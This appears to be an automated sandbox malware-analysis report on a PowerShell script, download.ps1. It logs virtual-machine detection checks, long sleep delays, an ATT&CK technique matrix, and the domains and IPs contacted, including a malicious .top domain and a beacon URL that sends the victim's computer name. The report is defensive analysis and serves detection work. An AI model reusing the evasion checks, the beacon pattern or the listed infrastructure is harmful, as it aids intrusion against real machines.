Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7632Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2076Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3308Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.1431782162.00000235E93FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.1431782162.00000235E938D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine>
Source: powershell.exe, 00000000.00000002.1393644816.0000023580D7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
121
Virtualization/Sandbox Evasion
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager121
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps13%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.181.132
truefalse
    high
    cmacnnkfbhlcncm.top
    45.61.136.138
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527false
        unknown
        http://www.google.com/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://$705rotusj9yfepq/$8au6hqz3bnw7ijk.php?id=$env:computername&key=$ukcqoy&s=527powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235814F3000.00000004.00000800.00020000.00000000.sdmpfalse
            unknown
            http://crl.microsoftpowershell.exe, 00000000.00000002.1430090401.00000235E9190000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.1417520976.0000023590269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.0000023581773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Licensepowershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://schema.org/WebPagepowershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://0.google.com/powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schema.org/WebPageXpowershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/powershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.microsoft.epowershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://www.google.com/images/hpp/gemini-spark-icon-dark-mode-2-42px.pngpowershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.google.compowershell.exe, 00000000.00000002.1393644816.0000023581769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.0000023581773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.0000023581787000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.google.com/images/hpp/gemini-spark-icon-dark-mode-2-42px.pngXpowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://apis.google.compowershell.exe, 00000000.00000002.1417520976.0000023590001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.0000023590269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235902F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.0000023581999000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.000002358179D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.microsoft.cpowershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1393644816.0000023580001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.google.com/url?q=https://blog.google/products/gemini/google-gemini-ai-holiday-planning-2powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.000002358179D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.1417520976.0000023590001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.0000023590269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235902F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.000002358179D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1417520976.00000235901D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.microsoft.ipowershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://contoso.com/Iconpowershell.exe, 00000000.00000002.1417520976.000002359006D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://0.googlepowershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.google.com/url?q=https://blog.google/products/geminpowershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://cmacnnkfbhlcncm.toppowershell.exe, 00000000.00000002.1393644816.0000023581769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1393644816.00000235814F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.google.com/logos/doodles/2024/year-in-search-2024-global-6753651837110649-2xa.gifpowershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1393644816.0000023580228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
